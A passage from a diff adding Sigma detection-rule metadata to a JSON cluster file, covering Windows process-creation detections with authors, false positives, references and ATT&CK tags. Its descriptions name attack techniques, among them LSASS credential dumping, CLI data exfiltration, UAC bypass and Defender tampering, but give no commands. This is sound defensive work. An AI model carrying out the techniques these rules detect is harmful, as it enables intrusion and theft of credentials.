"https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", + "value": "Suspicious Rundll32 Setupapi.dll Activity" + }, + { + "description": "Identifies creation of local users via the net.exe command.", + "meta": { + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." + ], + "filename": "proc_creation_win_net_user_add.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "value": "Net.exe User Account Creation" + }, + { + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" + ], + "tags": "No established tags" + }, + "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "value": "Suspicious Kernel Dump Using Dtrace" + }, + { + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "value": "Suspicious RDP Redirect Using TSCON" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_netsupport.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "value": "Use of NetSupport Remote Access Software" + }, + { + "description": "Detects Hurricane Panda Activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hurricane_panda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ] + }, + "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", + "value": "Hurricane Panda Activity" + }, + { + "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "value": "Suspicious Encoded Obfuscated LOAD String" + }, + { + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "meta": { + "author": "@pbssubhash , Nasreddine Bencherchali", + "creation_date": "2022/12/08", + "falsepositive": [ + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + ], + "filename": "proc_creation_win_lsass_shtinkering.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "value": "Potential Credential Dumping Via WER" + }, + { + "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", + "value": "Renamed FTP.EXE Binary Execution" + }, + { + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "meta": { + "author": "Aedan Russell, frack113 (sigma)", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_chrome_load_extension.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1176" + ] + }, + "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "value": "Powershell ChromeLoader Browser Hijacker" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners", + "Some build frameworks" + ], + "filename": "proc_creation_win_crypto_mining_monero.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "value": "Windows Crypto Mining Indicators" + }, + { + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_jsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "value": "JSC Convert Javascript To Executable" + }, + { + "description": "Detects various anomalies in relation to regsvr32.exe", + "meta": { + "author": "Florian Roth, oscd.community, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ] + }, + "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "value": "Regsvr32 Anomaly" + }, + { + "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_disable.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "value": "Disable Important Scheduled Task" + }, + { + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + ], + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "value": "Execute MSDT Via Answer File" + }, + { + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "meta": { + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "36210e0d-5b19-485d-a087-c096088885f0", + "value": "Suspicious PowerShell Parameter Substring" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester_parent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", + "value": "Execute Code with Pester.bat as Parent" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "GPO" + ], + "filename": "proc_creation_win_susp_screensaver_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "value": "Suspicious ScreenSave Change by Reg.exe" + }, + { + "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "meta": { + "author": "@SBousseaden (idea), Christian Burkard (rule)", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1531653369546301440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", + "value": "Office Directory Traversal CommandLine" + }, + { + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", + "falsepositive": [ + "Legitimate piping of the password to anydesk", + "Some FP could occure with similar tools that uses the same command line '--set-password'" + ], + "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "value": "AnyDesk Inline Piped Password" + }, + { + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/28", + "falsepositive": [ + "Unknown yet" + ], + "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6345b048-8441-43a7-9bed-541133633d7a", + "value": "ZOHO Dctask64 Process Injection" + }, + { + "description": "Detects the use of various cli utility related to web request exfiltrating data", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_exfil_data_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "value": "Possible Exfiltration Of Data Via CLI" + }, + { + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/06", + "falsepositive": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "filename": "proc_creation_win_susp_gup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", + "value": "Suspicious GUP Usage" + }, + { + "description": "Execute C# code located in the consoleapp folder", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of dnx.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_dnx.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ] + }, + "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "value": "Application Whitelisting Bypass via Dnx.exe" + }, + { + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate testing of Microsoft UI parts." + ], + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "value": "Use of VisualUiaVerifyNative.exe" + }, + { + "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", + "value": "Suspicious Cmd Execution via WMI" + }, + { + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_adcspwn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/ADCSPwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "value": "ADCSPwn Hack Tool" + }, + { + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "meta": { + "author": "CD_ROM_", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rundll32_parent_explorer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "value": "Rundll32 With Suspicious Parent Process" + }, + { + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "meta": { + "author": "behops, Bhabesh Raj", + "creation_date": "2021/10/08", + "falsepositive": [ + "Legitimate use by administrator" + ], + "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1059" + ] + }, + "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", + "value": "VMToolsd Suspicious Child Process" + }, + { + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "meta": { + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_reg_loader.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" + }, + { + "description": "Detects a file or folder's permissions being modified or tampered with.", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" + ], + "filename": "proc_creation_win_file_permission_modifications.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "value": "File or Folder Permissions Modifications" + }, + { + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "meta": { + "author": "frack113, Tim Shelton (update fp)", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "178e615d-e666-498b-9630-9ed363038101", + "value": "Suspicious Elevated System Shell" + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dns_serverlevelplugindll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "value": "DNS ServerLevelPluginDll Install" + }, + { + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of cmstp.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_cmstp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" + ] + }, + "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", + "value": "Bypass UAC via CMSTP" + }, + { + "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_base64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", + "value": "Powershell Defender Base64 MpPreference" + }, + { + "description": "Detects PsExec service execution via default service image name", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tool_psexec.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + 